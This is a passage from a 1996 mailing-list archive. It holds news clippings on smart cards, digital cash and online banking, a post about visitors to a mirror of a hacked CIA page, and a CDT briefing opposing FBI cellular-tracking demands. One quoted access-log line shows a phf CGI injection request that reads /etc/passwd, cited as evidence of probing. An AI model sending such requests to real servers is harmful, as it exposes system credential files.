Eugene Lockhart made in China 10 days ago. Officially, MasterCard and Mondex refused to comment, but sources inside both companies confirmed that a deal is imminent. Mr. Lockhart said in his speech that MasterCard would announce a major acquisition in the chip card sector in the next month. According to Reuters, he said the acquisition "would be global in scope and involve an alliance of 20 major banks." He also said MasterCard would own the "intellectual property rights stemming from the deal." National Westminster spun off its smart card unit in July, creating Mondex International Ltd., a joint venture with 17 bank partners worldwide. With three Japanese banks close to announcing Mondex franchises, the 20 banks referred to by Mr. Lockhart would be accounted for. Mr. Lockhart also told Reuters that People's Bank of China is considering a smart card launch. He may have mentioned the pending agreement to entice the bank. Mr. Lockhart was in China to promote Maestro, MasterCard's on-line debit brand, which will now be available through the Agricultural Bank of China. Industry observers thought Mondex's incorporation in July laid to rest rumors of a MasterCard takeover, which were circulating all summer. But it may have served to make the smart card company more attractive. "Before the announcement, Mondex looked a little tenuous," said a knowledgeable source. "After the (incorporation), it looked like something of value." The source also said that MasterCard's smart card strategy, which began with considerable fanfare more than two years ago, has fallen short of expectations, prompting Mr. Lockhart to seek a remedy. MasterCard's major smart card venture has been a pilot in Canberra, Australia, which started nine months ago. Visa, by contrast, is running several tests of its stored-value system globally. Several executives responsible for MasterCard's early efforts, including Philip Verdi and Robin Townend, have left the company in recent months. The deal would be a boon to both companies, sources said. While Mondex has increased its clout with incorporation, it's still facing "an uphill battle" to achieve worldwide acceptance, said the source. "Distribution is what you could assume Mondex is after," he added. National Westminster retained ownership of Mondex patents and trademark. It stands to recoup its substantial investment in the technology -- on top of a potential $150 million from Mondex franchise owners -- if the MasterCard deal is consummated. The bank remains a minority shareholder in Mondex International. Though the industry pooh-poohed National Westminster's initial efforts to put the fledgling payments system on the map, persistent marketing -- coupled with a strong technological base -- seems to be paying off. Electronic wallets, smart phones, and card-to-card monetary transfers set Mondex apart from some less ambitious smart card programs. With powerful investors like Wells Fargo & Co. in the United States, Royal Bank of Canada, as well as Hongkong and Shanghai Banking Corp., the new brand has gained credibility as a major contender in the chip card market. "Mondex blazed a trail," said Peter Hall, PSI International's managing director of consulting in London. MasterCard would be "buying into a pool of knowledge, buying into the partners," he added. Card industry sources said MasterCard and Mondex have many details to address before they can conclude a deal, including corporate structure and governance. One of the biggest issues will be whether to retain the Mondex trademark or "go with the strength of the MasterCard brand," said a source close to the deal. That decision will be made "down the road," he added. The deal is expected to close within three months. No papers have been signed to date. American Banker: Tuesday, September 17, 1996 Chase to Offer Dealerships Auto Loan Decisions Over Internet By DREW CLARK Chase Manhattan Corp.'s auto financing division has begun using the Internet to provide dealerships with loan-approval decisions. The bank is the first of eight financial institutions that have committed to using the system, developed by International Business Machines Corp. By computerizing loan applications and sending data electronically, Chase officials said the bank can grant approvals in as few as two minutes. "It reduces my costs and adds to dealer satisfaction by getting a quick turnaround," said James B. Brew, president of Chase Automotive Finance Corp. Up to 50% of the division's auto loans will be running through the system within the next 18 months, he said. Chase, the largest car lender not affiliated with a car company, is connected to six dealerships currently using the system and will establish connections to 100 dealers with the official introduction in October. Other financial institutions planning to use the on-line system include NationsBank Corp., Charlotte, N.C.; GE Capital Auto Financial Services Inc., Barrington, Ill.; Regions Financial Corp., Birmingham, Ala.; and Citibank Puerto Rico. The auto finance program, residing on the dealer's personal computer, features a user-friendly screen display with step-by-step instructions and error checks. Auto dealers can manually override the screens. The dealer's computer is connected to the Internet through the IBM Global Network, which is also used to retrieve an encrypted report from a credit bureau. The dealer's pre-established "key" decodes the report and causes the screen to display one, two, or three stars - representing poor, fair, or good credit. This gives the dealer an idea of which financial institutions are most likely to approve the loan. "If the consumer is looking over the dealer's shoulder, they don't see the word 'loser' flash on the screen," said Neil Lustig, manager of the project for IBM, explaining the rating system. Although Chase currently is the only bank with a direct Internet connection to the system, the dealer can still send loan applications to other institutions by adding their fax numbers to the screen display. "We piloted this in our Saturn dealership, and it lent to the customer- friendly atmosphere perfectly," said John Burns, a dealer in Hempstead, N.Y. The system costs about $700 a month, but it can also replace existing printers and fax machines. "The old system involved faxing applications which came back with the credit worthiness in a few hours," Mr. Burns said. Now, "the information is going in immediately and is analyzed immediately. If there is a glitch, you can discuss it." IBM said it plans to extend connections for peripheral services like auto insurance and extended warranties. In about a year, the company plans to publish a World Wide Web site offering auto insurance directly to individual customers, said Mr. Lustig. "When enough people use the Internet, the economic model will change," he said. "If we did that today, we would just disintermediate the dealerships." News Release (Wired): Tuesday, September 17, 1996 Citibank's Retired CEO Walter Wriston on the Future of Money SAN FRANCISCO Though he's in his 70s, Walter Wriston may be the world's most wired banker. As chairman and CEO of Citibank in the '60s, '70s and '80s -- a time when money began turning itself into digital bits and bytes and flowing around the world via satellite transponders and fiber-optic cables -- Wriston was a major force in the creation of the modern, global, technological financial system. Wriston retired in 1984, but his vision of banking is still cutting-edge. In an interview with Thomas Bass in the October issue of Wired, Wriston talks about digital money, the new economy, and prospects for the nation-state in an increasingly borderless, networked world. During Wriston's reign, Citibank became the banking industry's technology leader, guiding its customers away from the local teller window toward a new way of banking -- automated, online, checkless, and international, based on distributed networks of computers and ATMs. When Wriston retired, Citibank was the largest bank in the country, and its investment in computer hardware and software approached US$1.75 billion. In a revealing exchange, Wriston doubts whether banks will be running the financial supermarkets of the future as they continue to lose ground against non-bank financial powerhouses, such as Merrill Lynch and General Electric. Wriston says the future of cash lies in smartcards. Already in wide use in France, Japan, and Germany, smartcards can be secure and rechargeable, protected by digital photographs or DNA signatures. According to Wriston, the creation of an international standard for encryption is inevitable "because it's necessary for the safety of the world." What about the export controls on strong encryption imposed by the U.S. government? Wriston says to lift them: "You can buy better stuff in Europe than you can here. We don't have a monopoly on brains." As for censorship on the Net? "There is no way on God's green Earth the government can exercise censorship of the Net in any meaningful way." On the nature of markets, Wriston believes the spread of economic freedom leads to the spread of political freedom. "Markets are self- correcting. That's why I trust markets more than governments. Governments usually aren't self-correcting, until it's too late." Find out why the value of money is hooked to nothing other than the information that flows through it -- in the October issue of Wired. Thomas Bass is the author of "The Eduaemonic Pie." His latest book, "Vietnamerica: The War Comes Home," is published by Soho Press. Wired 4.10 is available on newsstands for US$4.95, by calling 800/SO WIRED, or by sending email to subscriptions at wired.com. Fortune: September 30, 1996 What's New About Digital Cash? By Justin Fox E-money is coming, and it's about time. The advance of "smart cards," digital checks, and Internet cash will change how people shop and do business. Banking should become more efficient and less aggravating. It may even become possible to make money on the Net. But don't let all the conferences, cover stories, and alarmist pronouncements on the subject get you too excited--or scared. E- or no e-, it's still just money. For currency traders and others dealing in huge sums, who have long been able to zap billions of dollars across the globe in seconds, money as electrons isn't anything new. Nearly 90% of the money that changes hands in the U.S. every day does so electronically. It's that other 10%, which slouches along in the form of cash and checks, that e-money promises to change. And why not? Would anyone wax nostalgic about today's unbearable slowness of check clearing, in which banks that do their bookkeeping on computers hire fleets of airplanes to fly bundles of paper checks around the country every night? It will be years before the planes are grounded, but there are already signs of hope. Lots of regular transfers, like paychecks, are already handled electronically; banks are offering checklike debit cards; and Visa is testing utility bills that are sent out and paid online. Visa, Mastercard, and a British multibank venture called Mondex are rolling out chip-based smart cards that can store digital cash. The card companies, banks, and assorted startups are on the verge of making it easy and (relatively) safe to pay for things over the Internet. These e-money peddlers smell huge opportunities in the $ 4 trillion of U.S. consumer purchases that are still paid for each year with cash and checks. "If we can just electronify a small percentage of that, you can see what that will do to our business," says Carl Pascarella, CEO of Visa USA. A few problems need solving before e-money achieves ubiquity--like fraud and consumer resistance. But credit cards overcame similar problems in the 1960s, and like credit cards, e-money is too compelling not to take off. E-money costs much less to handle than paper cash or checks, and it offers consumers the ease and safety of credit cards without many of their limitations. (Credit card transaction costs make small payments uneconomical; they can only be used to buy things from merchants who are part of the card network; and they do not offer the protection of anonymity.) When e-money does hit it big, it will profoundly change--and greatly expand--electronic commerce. Software could be paid for on a per-use basis--a tenth of a cent a time, say. Journalism could be bought by the article. Anybody could set up an online business and instantly rake in revenue. What e-money probably won't do, however, is fundamentally transform the nature of money, although a lot of technoprophets think it will. Auguries tend to vary on a theme: Money and central banks as we know them will disappear, national currencies will become extinct, etc. A particularly alarming Web tract on the topic predicts we'll all be tattooed with something akin to a universal pricing code to make sure we're not using someone else's smart card. Hidden in the code will be the numbers "666." And we all know what that means. Mainstream economic theory has no answer for the 666 contention, but the other concerns (or hopes, depending on who's talking) are pretty easily dismissed as overheated hoo-hah. The one truly revolutionary change in money over the past couple of centuries has been the switch from coins made of precious metals to notes made of paper. It was in 1971, when the world's major currencies threw off their last remaining shackles to gold, that money became imaginary stuff, its value derived purely from trust. Compared with that, switching from paper imaginary money to digital imaginary money simply isn't that big a deal. It won't expand the money supply. It won't of itself make national currencies irrelevant. Digital money can indeed move faster, over mountains and across borders, than paper checks or cash--hence reducing governments' ability to control its flow. But the big money started moving this way in the 1970s, at the time setting off all sorts of alarms about the loss of central bank power. "The striking parallels give the distinct impression that 'we've been here before,' " Fed governor Edward Kelley said at a recent conference. "Then as now, the potential impact on monetary policy of new electronic payment products has been greatly exaggerated." Fed governors can be wrong, of course. But since much economic activity will remain forever off line, it's hard to see how e-money could entirely supplant national currencies in the real world. Unless technology makes it possible to digitally pay for and deliver, say, a pizza. When that happens, there will be no denying it: E-money (and e-anchovies) will have transformed the world. --Justin Fox --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From cmefford at avwashington.com Fri Sep 20 12:45:45 1996 From: cmefford at avwashington.com (Chip Mefford) Date: Sat, 21 Sep 1996 03:45:45 +0800 Subject: Public Apology Message-ID: A feller let me know this afternoon that I have been posting with a really irritating .sig I didn't know that sucker was on there. I'm really sorry From dlv at bwalk.dm.com Fri Sep 20 12:48:35 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 03:48:35 +0800 Subject: [NEWS] Crypto-relevant wire clippings Message-ID: <2P7JuD2w165w@bwalk.dm.com> Washington Post: Monday, September 16, 1996 Players With Paperless Money By Michelle Singletary Banking via personal computer is expected to increase 600 percent in the next two years, according to a 1996 technology report by the American Bankers Association and the Ernst & Young accounting firm. Telephone banking is predicted to grow 50 percent over the next two years and some experts estimate that 30 percent of U.S. households will be banking electronically by 2000. Little known to most consumers, the Washington area is home to a small but burgeoning subset of the electronic banking industry. The companies in this emerging market, many of them clustered in Northern Virginia, are helping to build the technological infrastructure that is rapidly changing how, when and where consumers bank. Companies such as US Order, Online Resources & Communications Corp., Transaction Network Services (TNS), Visa Interactive and CyberCash Inc., all based in Northern Virginia, are members of a group of start-up technology companies that are helping facilitate the delivery of electronic and phone banking services. "The D.C. area has a nice cross section of aggressive and innovative home banking players," said Phoebe Simpson, an analyst with New York-based Jupiter Communications Co., a market research firm for the on-line industry. Banking and technology experts agree that these Northern Virginia companies have become integral partners with banks in building the infrastructure that will support electronic commerce. They are selling the software, hardware, processing services, communication linkups and back-office support systems that enable financial institutions to interact with their customers outside of bank branches. While bank offices are not in danger of disappearing, bankers are increasingly looking for lower-cost delivery channels. Most are turning to outside electronic commerce companies to help them set up their own on-line or phone banking systems. "What we have now is banking without boundaries. Banks now need to cooperate and collaborate with a whole new source of channel operators," said Richard Crone, vice president and general manager of CyberCash. "Our charter is to empower customers to do their banking anywhere, any time or with anything." One reason many of these companies have set up shop here, said company executives and banking consultants, is to be near such technology firms as Washington-based MCI Communications Corp., Dulles-based America Online Inc. and PSINet Inc., an Internet access company based in Herndon. "We are the de facto Silicon Valley for on-line information companies," said John J. McDonnell Jr., president and CEO of TNS of Reston. The company has developed a low-cost system for facilitating high-speed, point-of-sale transactions, such as those made with credit or debit cards. Many company executives said they decided to launch their firms in Northern Virginia because of its proximity to banking regulators and lawmakers, who are trying to determine how electronic banking technology will affect consumers and what laws might be needed to protect customers. "This industry is important and will have a lot of regulatory need," said David Weisman, director of money and technology strategies for Forrester Research Inc., a consulting firm in Cambridge, Mass. But chief among the reasons for the growing number of electronic banking companies is the Washington area's highly skilled labor force, Weisman said. The labor pool in the area is overflowing with engineers and others with telecommunications and software experience, said Matthew P. Lawlor, chairman and CEO of Online Resources in McLean. For the most part, the on-line technology companies in this region don't compete with one another, experts said. Instead, each has positioned itself to fill certain niches in the electronic banking industry. In fact, many of the companies are linked financially or have developed partnerships. For example, TNS got its start-up capital of $ 1.5 million from William N. Melton, CyberCash's co-founder. US Order sold its core on-line banking operations to Visa Interactive, and 50 of its employees went to work for the newly formed company. Now the two companies market each other's services. "This is a monstrous market and no single organization is going to dominate," said William Gorog, chief operating officer of US Order. Gorog said CyberCash's concentration on developing secure payment systems for electronic commerce on the Internet is good for US Order's business. CyberCash, based in Herndon, currently uses encryption technology for secure transmission of credit-card data. Online Resources has decided to go after small and medium-size banks to sell its home banking services. Online's services include home banking via computer, bill-paying software, screen-based telephones and interactive voice response systems for touch-tone telephones. "A company like Online Resources allows a small bank like us to get into this technology at a much more reasonable rate," said Frank Bentz, vice president of communications for Sandy Spring National Bank, an Ol ney-based banking institution with assets of $ 920 million. Visa Interactive of Herndon, which offers some of the same services as Online Resources, has signed up some of the nation's largest financial institutions including Banc One Corp. of Ohio, Barnett Banks Inc. of Jacksonville, Fla., and the Pentagon Federal Credit Union, the second-largest credit union in the Washington area. "These companies are the pioneers in this industry," said James Wells, managing director for electronic commerce at Washington-based Furash & Co., a financial services consulting firm. "By and large, the technology and innovation that is facilitating electronic commerce is not coming out of the banks." Although experts said the electronic commerce companies in Northern Virginia are still relatively small, they are creating a significant base of high-paying technical jobs. Software developers at TNS earn $ 50,000 to $ 85,000 annually, according to McDonnell. "This is not minimum-wage work," McDonnell said. "We have not spawned a lot of jobs but you have to look at the trickle-down effect. We pay big salaries so our employees can buy big cars." In just two years, CyberCash has quadrupled its employment to 160, half of whom work in the area. TNS has 110 employees, up from 45 just two years ago. Online Resources, which had 50 employees at the end of last year, now has 80. In the next several months, the company expects have 100 employees. "I think that the idea of creating brand-new companies and employing a hundred-plus people, especially at high-end salaries like what engineers make, will have a definite impact on the area," said Magdelena Yesil, one of the founders of CyberCash who recently left the company to start another technology firm. "People are beginning to see Virginia as an area similar to Silicon Valley, an area for launching technology companies. There is a sense of excitement." Transaction Network Services Like many entrepreneurs, John J. McDonnell Jr. was working for another company when he came up with the idea for TNS. McDonnell had been president and CEO of Digital Radio Network Inc., a Tysons Corner firm that used radio waves to carry point-of-sale transactions. McDonnell discovered that a fast-dial service could be created to carry the signal using the 950 dial-up access offered by local telephone carriers. McDonnell said he took this idea to Digital Radio's directors, but they weren't interested. So, he asked if he could trade in his stake in Digital Radio -- 4 percent of its stock -- in exchange for the right to start up a company using the idea for the transaction-oriented system. He left Digital Radio in 1989. In less than five years, TNS has become one of the biggest players in this electronic banking niche. TNS processes about 2.2 billion point-of-sale transactions a year and has captured about 30 percent of the market. The company was profitable after its first year, McDonnell said. For its most recent quarter, ended June 30, TNS reported net income of $ 1.5 million (12 cents a share), a 36 percent increase from income of $ 1.1 million (10 cents) for the same period a year earlier. The company had a year-over-year increase of 66 percent in transaction volume from its point-of-sale division. On June 3, 1991, the first day of of its operation, TNS carried 43 transactions from two Sizzler steakhouses in Arlington, McDonnell said. At 3 cents a transaction, the company generated $ 1.29 in revenue that day. On June 3, 1996, the company handled 5.6 million transactions at an average cost of 2 cents -- taking in $ 118,000 for the day. "I am a happy man," McDonnell said. Online Resources & Communications Corp. Matthew P. Lawlor views Online Resources as a one-stop shop for banks that want to provide electronic banking options for their customers. "My vision is that there will not be a single device that will be the winner in on-line banking," Lawlor said. Instead of guessing which new electronic banking technology consumers will embrace, the chairman and chief executive of Online Resources has decided to offer a full range of services to banks. Lawlor sees a future in which consumers will want to link up to their bank via touch-tone phone, personal computer, a specially designed screen-based telephone, television set or other devices that have not yet been designed. "In essence, the technology is moving so fast, half of what we do is keeping up with it," Lawlor said. Lawlor said he has positioned Online Resources to provide small and medium-size financial institutions with any of the applications and support systems they need to market interactive bank services. In a year, privately held Online Resources has gone from a client list of seven financial institutions to 42 today, including Washington-based Riggs Bank, First Virginia Banks of Falls Church and Baltimore-based Harbor Bank. "In the very beginning, we focused on the big guys but many of these big banks have their own technology people," he said. "Many of the small and mid-size banks need our skills." CyberCash Inc. CyberCash executives are quite clear on their company's role in electronic banking: It is a contractor building the "infostructure" that will allow banks to link up to their customers in cyberspace. "If you asked a banker 10 years ago what business he was in, he would say loans, deposits and transactions," said Richard Crone of CyberCash. "That's like saying Amtrak is in the railroad business, when they are in the transportation business. Banks today are in the information business," he said. "The value they have, for example, is informing someone that their loan has been prequalified." Crone thinks the personal computer is the bank branch of the future, through which hundreds of thousands of customers will want to conduct their banking and bill-paying business. "Consumers are going to be looking for the electronic connections that will let them reach out to the banks any time and anywhere," he said. To help move that process along, CyberCash has developed and will soon begin to test software that would allow credit card firms, utility companies and other businesses to securely receive their bills over the Internet. CyberCash is banking that consumers will want to review their bills this way and that with a double-click of a mouse will access an account and pay their creditors electronically. "We want to provide the ability to fund value in an electronic wallet," Crone said. Visa Interactive In 1994, Visa Interactive, a subsidiary of Visa International, entered the on-line industry by purchasing the electronic banking and bill-paying operations of US Order. Now, experts are predicting that Herndon-based Visa Interactive, with its credit-card ties to thousands of financial institutions, could catapult ahead of competitors such as Online Resources. The company has signed up more than 90 financial institutions for its remote banking services. Visa's goal, like those of other remote banking firms, is to build a network of services that preserve financial institutions' identities and customer relationships, much like its parent does with its credit-card services. "I think you will see, two years down the road, that Visa Interactive will have a rich offering of services and they will be among the major players in terms of revenue," said Simpson of Jupiter Communications. US Order Although Herndon-based US Order sold a core part of its home banking services to Visa International two years ago, it is still a key player in the electronic commerce industry. "We are right in the middle of the electronic banking business," said John C. Backus, US Order's president and chief operating officer. Among its services are bank-branded customer service, centers that handle calls for phone banking, touch-tone telephone voice recognition hardware and software systems for home banking. It also sells PC-based remote banking technology and screen-based telephones, which at a retail cost of $ 299 can dial into a consumer's bank, provide stock quotes, sports scores, news and weather information or a nationwide directory assistance service. "We enable the banks to open up the whole range of electronic commerce," said Gorog, US Order's CEO. Gorog said he's excited that his company and other Northern Virginia firms are part of an industry redefining consumer banking. "The opportunity to change the banking business is exhilarating," Gorog said. "It's so exciting that we are changing people's banking habits." Time: September 23, 1996 Cashless, Not Bankless By Adam Zagorin After watching everyone from Microsoft to Meca Software gobble up online-banking customers, banks have become eager to prove that they're not headed for extinction. Last week IBM and a group of 15 U.S. and Canadian banking behemoths, including Bank of America, Banc One and Mellon Bank, unveiled a venture that aims to provide a full range of financial services to the banks' 60 million customers at the touch of a telephone button or the click of a mouse. Called Integrion, the partnership will phase in such activities as bill paying, electronic lending and stock and bond trading beginning next year. "If we are dinosaurs," says Robert Gillespie, the chief executive of Cleveland-based KeyCorp, "then we're putting competitors on notice that a new breed has evolved with a voracious appetite for expanded market share." Perhaps so, but the new predators have some catching up to do. Fewer than 300 U.S. banks have set up Internet sites. Most analysts give the holdouts four years to either get wired or get left far behind. Consumers can already pay bills and check balances through computer networks like America Online and CompuServe. Microsoft, too, has been signing up banks to provide electronic financial services. Integrion plans to battle the software giant by linking consumers to accounts through the Internet, and with financial software like Intuit's Quicken. The partners will also set up interactive kiosks that act like bank branches for home banking away from home. "With this new venture," says IBM chairman Louis Gerstner, "electronic commerce will take its biggest step forward to date." The ambitious project will join a host of so-called E-money experiments that are popping up around the globe. The goal is to replace cash and checks with electronic transactions that cost just pennies to process. Citibank, a leader in this push for a cashless society, is developing what it calls an Electronic Monetary System that will permit consumers and companies to make payments electronically anywhere in the world. Visa, fresh off a test of 300,000 smart cards--plastic embedded with a cache of electronic cash--at the Atlanta Olympics, will soon launch similar projects in 14 other countries, including Canada, Australia and in Hong Kong. E-money devotees like Valerie Baptiste, a San Francisco secretary, think cash is passe. Baptiste pays for her morning bagel and decaf with a smart card designed by Britain's Mondex and being tested in the U.S. with partners that include Wells Fargo and AT&T. As other customers fumble with change, Baptiste hands her card to a cashier who takes less than five seconds to punch it into a machine that deducts $ 2.15 from the stored-up funds. "This is the beginning of the end of cash," Baptiste says. Unless banks charge swiftly into the E-money era, it could be the end of many of them too. Associated Press: Tuesday, September 17, 1996 Merchants Like Smart Cards to Keep Tabs on Customers By PATRICIA LAMIELL Merchants are attracted to "smart cards" as a way to gather information about their customers, according to a survey released Monday by a group promoting the plastic cash cards that are embedded with a computer chip. Results were released at the opening of the two-day convention of the group, the Smart Card Forum, which also is trying to to convince the public that smart cards are protected and confidential. Customers can use smart cards like debit cards or automatic teller cards, to pay for anything from gas to groceries. Because the card also has a computer chip, it can keep track of what consumers buy and when, and how much they spend. "A smart card can store data about customers, such as product preferences, spending history, and important information that can help provide improved personalized customers service," said Cliff Wilke, vice president for business development at Mobil Oil Credit Corp. Polls done by the Harris organization and the forum have shown that consumers are receptive to using smart cards but concerned about storing personal data on them. In a 1995 forum study, 70 percent asked what safeguards exist to prevent unauthorized access to their personal, financial and medical information. Merchants surveyed by the Smart Card Forum said the cards made transactions quicker and cheaper for them. They also said the cards made it easy to gather information on customers for use in marketing and promotional programs, and for loyalty programs like frequent flier miles. Most merchants surveyed said they believed consumers spend more when they pay with a credit or debit card than when they pay with cash. The study found other benefits to merchants such as theft prevention. The study also indicated that the cards don't have to be used that much to make them cost-effective for the merchant. "Grocery stores, convenience stores, movie theaters and gasoline retailers indicated that a mere 2 to 10 percent - an extremely low threshold of consumer demand - is required for them to realize the benefits of smart cards," the group said. While the survey results released by the forum highlighted selling points for the cards, recent tests have revealed obstacles to be overcome to win merchant and consumer acceptance. Consumers were frustrated when they found some merchants listed in smart card directories either had not installed equipment for using the cards or stopped using the equipment because of malfunctions, according to an independent study of the Visa Cash Card tests at the Olympics in Atlanta. But that study, released earlier this month by Brittain Associates Inc., also reported that most smart card users said they found the card attractive and would use it in the future if the number of merchants accepting it increased dramatically. The Smart Card Forum interviewed 65 major merchants in 11 categories, such as grocery, gas, convenience stores, drug stores, restaurants and theaters. Established in 1993, the forum has more than 225 corporate and government members including Chase Manhattan Corp., Citibank, MCI Communications Inc., MasterCard, Visa, International Business Machines Corp., Microsoft Corp., Mobil and Delta Air Lines Inc. Federal agency members include the Postal Service, the Federal Reserve, and the treasury and defense departments. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From skeeve at skeeve.net Fri Sep 20 13:02:43 1996 From: skeeve at skeeve.net (Skeeve Stevens) Date: Sat, 21 Sep 1996 04:02:43 +0800 Subject: Go away CIA Message-ID: <199609201646.CAA00999@myinternet.myinternet.net> Well well... After putting up the CIA hack mirror page on http://www.skeeve.net/cia/ I learnt a few things. o it got 50,000 hits in 1 day o everyone from the cia, senate, fbi, nsa (ncsc) and every other bloody US gov department looked at it masses of times. The CIA looked at it every 10-15 minutes. zztop{root}:15: cat skeeve.net-access_log | grep ucia.gov | wc -l 281 o Even the CIA tries to hack you. relay1-ext.ucia.gov unknown - [21/Sep/1996:01:56:44 +1000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 1180 o Dozens of in.fingerd/in.telnetd attempts from ucia.gov, some mil sites and ncsc.mil sites. as I speak the house are looking at it. b252-209.house.gov unknown - [21/Sep/1996:02:41:37 +1000] "GET /cia/ I "PRESUME" there are no laws (international or otherwise) being broken by my housing of the mirror... not like I actually care.. but it would be good to know. Ok... ive been up all night chuckling at all the different sort of sites hitting the mirror... time to sleep. -------------------------------------------------------------------- Skeeve Stevens Email: skeeve at skeeve.net CEO/The Big Boss/All round nice guy URL: http://www.skeeve.net/ MyInternet Australian Anglicans Online http://www.myinternet.net/ http://www.anglican.asn.au/ Phone: (+612) 869-3334 Mobile: (0414) SKEEVE [+61414-753-383] Key fingerprint = D2 7E 91 53 19 FE D0 5C DE 34 EA AF 7A 5C 4D 3E From editor at cdt.org Fri Sep 20 13:13:57 1996 From: editor at cdt.org (Bob Palacios) Date: Sat, 21 Sep 1996 04:13:57 +0800 Subject: CDT Policy Post 2.32 - FBI Surveillance Demands Rejected on Privacy Grounds Message-ID: ----------------------------------------------------------------------------- _____ _____ _______ / ____| __ \__ __| ____ ___ ____ __ | | | | | | | | / __ \____ / (_)______ __ / __ \____ _____/ /_ | | | | | | | | / /_/ / __ \/ / / ___/ / / / / /_/ / __ \/ ___/ __/ | |____| |__| | | | / ____/ /_/ / / / /__/ /_/ / / ____/ /_/ (__ ) /_ \_____|_____/ |_| /_/ \____/_/_/\___/\__, / /_/ \____/____/\__/ The Center for Democracy and Technology /____/ Volume 2, Number 32 ---------------------------------------------------------------------------- A briefing on public policy issues affecting civil liberties online ---------------------------------------------------------------------------- CDT POLICY POST Volume 2, Number 32 September 20, 1996 CONTENTS: (1) FBI Demands for Broad New Surveillance Power Rejected on Privacy Grounds (2) CDT Background Memo on the FBI Demands (3) How to Subscribe/Unsubscribe (4) About CDT, contacting us ** This document may be redistributed freely with this banner intact ** Excerpts may be re-posted with permission of ** This document looks best when viewed in COURIER font ** ----------------------------------------------------------------------------- (1) FBI Demands for Broad New Surveillance Power Rejected on Privacy Grounds A telecommunications industry standards body on Thursday voted to reject a demand by the FBI to create a national tracking system out of the wireless telephone network. CDT applauds this decision as a significant victory for privacy and condemns the FBI's blatant efforts to subvert the specific requirements of the Communications Assistance for Law Enforcement Act (CALEA, also known as "Digital Telephony"). "The FBI is demanding that every cell phone double as a tracking device, providing instant and continuous location information not just when a subject is talking but whenever a cellular phone is turned on. " said CDT Executive Director Jerry Berman. "The FBI is demanding real-time tracking of anyone suspected of committing a crime. This is a clear violation of the statute and the Fourth Amendment." Berman added At issue are technical standards currently being drafted to implement the 1994 law. The FBI, which holds an influential position within the industry standards process, has demanded that the wireless telephone network be designed in a way that would allow real time tracking of individuals suspected of a crime. Specifically, the FBI is demanding that wireless networks be designed to facilitate: * Tracking of the physical location of a subject any time a cellular phone is turned on (even if no call is being made or received) * Tracking of the physical location of a subject when a cellular phone moves within a service area or moves to another carrier's service area * Tracking of the physical location of a subject when a cellular phone makes or receives a call * Delivery of this information to law enforcement in real time (within 500 milliseconds) Although law enforcement currently has the authority to obtain certain location information through a search warrant, the standards proposed by the FBI would have allowed access to far more detailed location information under a lower standard. "The law was designed to freeze the FBI in time, not as a blank check to the FBI to design the telecommunications network any way it pleased." Berman said. "The FBI's demands go far beyond what's permitted under CALEA and contradict statements by Director Freeh before Congress 2 years ago." The drafters of CALEA specifically stated that the statute was not designed to expand law enforcement surveillance authority. The Committee report on the legislation notes: "The FBI director testified that the legislation was intended to preserve the status quo, that it was intended to provide law enforcement no more and no less access to information than it had in the past. The Committee urges against over broad interpretation of the requirements." -- House Judiciary Committee Report to Accompany H.R. 4922. Rept. 103-827 Part 1, Page 22 NEXT STEPS In order to ensure public oversight and accountability over the FBI's surveillance authority, CALEA requires the government to reimburse the telecommunications industry for the costs of meeting the statute's requirements. Congress is currently considering a mechanism to fund the implementation of the law. CDT urges the Congress to exercise its oversight role to determine whether the FBI is seeking to use CALEA to expand current surveillance capabilities contrary to the specific intent of the law. Unless and until the FBI clarifies its intent and justifies its demands, Congress should not allow the expenditure of any funds to implement CALEA. CDT and a ad-hoc task force of other privacy organizations and telecommunications industry representatives are currently conducting a review of electronic surveillance issues at the request of Senators Patrick Leahy (D-VT) and Arlen Specter (R-PA). The task force report will cover the implementation of CALEA and will be released within the next few months. CDT stands ready to intervene again at the standards setting process and before the FCC if necessary in order to ensure that privacy is protected as CALEA is implemented. The Center for Democracy and Technology is a Washington DC based non-profit public interest organization focusing on free speech and privacy issues in new computer and communications technology. CDT can be found on the World Wide Web at: http://www.cdt.org/ ----------------------------------------------------------------------- (2) CDT BACKGROUND MEMO ON THE FBI DEMANDS FBI SEEKS TO USE CELLULAR TELEPHONES AS TRACKING DEVICES The FBI is demanding the telecommunications industry design cellular telephone networks in a way which would allow law enforcement to track the physical location and movements of individuals in clear violation of the law. This effort by the FBI raises grave privacy concerns and must be rejected by the telecommunications industry. In ongoing discussions with a Telecommunications Industry Association committee established to set technical standards to implement the Communications Assistance for Law Enforcement Act (CALEA, P.L. 103-414, also known as the "Digital Telephony" statute), the FBI is requesting surveillance capability far beyond current law enforcement capabilities and in clear violation of the scope of the law. CALEA was not designed as a blank check from Congress allowing law enforcement to design the telecommunications network to expand existing surveillance capability. Rather, the statute was carefully balanced to ensure that law enforcement maintain the status quo. This overreaching by the FBI raises serious privacy concerns and clearly violates the balance struck by CALEA. CDT strongly urges Congress to refrain from approving any funding for the implementation of CALEA until the FBI makes its intentions clear. FBI Demanding Location Information In Clear Violation of the Statute The FBI's request is contained in a proposal called the Electronic Surveillance Interface (ESI), which specifies the design of the interface between the telecommunications network and law enforcement's own surveillance equipment. The FBI has refused a formal request by CDT to view a copy of the ESI. However, documents obtained from a meeting of the FBI and the telecommunications industry on September 12 indicate that the FBI is demanding that cellular networks be designed to deliver location information to law enforcement. Specifically, the ESI states that cellular networks must be designed to provide the geographic location of a particular subject: The ESI states: R7-62 The SSM (Surveillance Status Message) shall be delivered to the LEA (Law Enforcement Authority) whenever the subject changes location or between systems and this location is available to the IAP (Intercept Access Point) In short, the FBI is requesting that the cellular network be designed to report the geographic location of an individual subject: 1. When a cellular phone is turned on (even if no call is made) 2. When a cellular phone moves within a service area or moves to another carrier's service area. 3. When a cellular phone makes or receives a call. The FBI claims that location information has to be provided to law enforcement under CALEA because it is part of "call setup information." However, in his testimony before a joint hearing of the House and Senate Judiciary Committees on March 18, 1994, FBI Freeh director stated exactly the opposite: "Several privacy-based spokespersons have criticized the wording of the definition (of call setup information)... alleging that the government is seeking a new, pervasive, automated 'tracking' capability. Such allegations are completely wrong.... In order to make clear that the acquisition of such information is not... included within the term 'call setup information' we are prepared to add a concluding phrase to this definition to explicitly clarify the point: '*** except that such information [call setup information] shall not include any information that may disclose the 